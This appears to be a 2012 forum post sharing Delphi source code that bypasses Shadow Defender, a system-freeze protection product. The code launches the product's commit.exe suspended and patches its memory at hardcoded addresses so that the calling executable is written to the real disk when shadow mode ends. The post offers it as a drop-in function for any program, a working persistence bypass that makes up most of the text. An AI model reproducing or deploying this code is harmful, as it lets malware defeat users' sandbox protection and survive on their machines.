A forum for reverse engineering, OS internals and malware analysis 

shadow-defender system freeze (bypass)

Forum for discussion about user-mode development.

shadow-defender system freeze (bypass)

 #16834  by Houdini
 Sun Nov 25, 2012 7:08 pm
Hello,

try to run the attached samples in shadow mode by shadow-defender final version - 32 bit -
Code: Select all
www.shadowdefender.com
when exit shadow mode owr attached simple not deleted by shadow-defender
it auto commited to original drive

this is the source
Code: Select all
program commitme;


uses
  windows;


function __commiteme (param : string):bool;
var
hshadow : hkey;
vshadow : array [0..255] of char;
rshadow : string;
written : dword;
readden : integer;
pi : tprocessInformation;
si : tstartupInfo;

const
one_data : array [0..6] of byte = ($90,$90,$90,$90,$90,$39,$DB);
one_addr : cardinal = $00403976;

tow_data : array [0..33] of byte = ($56,$FF,$15,$E8,$F2,$43,$00,$68,$E8,$03,$00,$00,$56,$FF,$15,$20,$F2,$43,$00,$A9,$02,$01,$00,$00,$75,$ED,$6A,$00,$FF,$15,$F8,$F0,$43,$00);
tow_addr : cardinal = $00403A4E;

mov_data : byte = $89;
mov_addr : cardinal = $0040328E;

ini_data : array [0..02] of byte = ($89,$DE,$75);
ini_addr : cardinal = $0040363E;

begin
result := false;
fillchar(si, sizeof(tstartupinfo), #0);
fillchar(pi, sizeof(tprocessinformation), #0);
if regopenkeyex(hkey_local_machine,'software\shadow Defender',0,KEY_ALL_ACCESS,hshadow) <> 0 then exit;
readden := sizeof (vshadow);
if regqueryvalueex(hshadow,'path',nil,nil,addr(vshadow),addr(readden)) <> 0 then exit;
rshadow := string (vshadow) + '\commit.exe';
param := '"'+rshadow+'"' + ' ' +param+'|';
if not createprocess(pansichar (rshadow),pansichar (param), nil, nil, false,create_suspended, nil, nil, si, pi) then exit;;
if not writeprocessmemory (pi.hprocess,ptr (one_addr),addr (one_data),length (one_data),written) then exit;
if not writeprocessmemory (pi.hprocess,ptr (tow_addr),addr (tow_data),length (tow_data),written) then exit;
if not writeprocessmemory (pi.hprocess,ptr (mov_addr),addr (mov_data),1,written) then exit;
if not writeprocessmemory (pi.hprocess,ptr (ini_addr),addr (ini_data),length (ini_data),written) then exit;
if resumethread (pi.hthread) = $ffffffff then exit;;
result := true;
end;
begin
{
coder : houdini (c) , www.at4re.com (tm)

how using : function __commiteme (path :string):bool;
path = full file path to commite it

add your code here or copy function to your project code
and call the "__commitme" function with full file path as a param to commite it
if the function succeeds, the return value is : true , else any error it return false
}

{ example : }
__commiteme (paramstr(0));
{ paramstr(0) = a delphi var content current running exutable file full path }
end.
regards
Attachments
exec in shadow mode - no deleted -
(8.45 KiB) Downloaded 38 times
 Return to “User-Mode Development”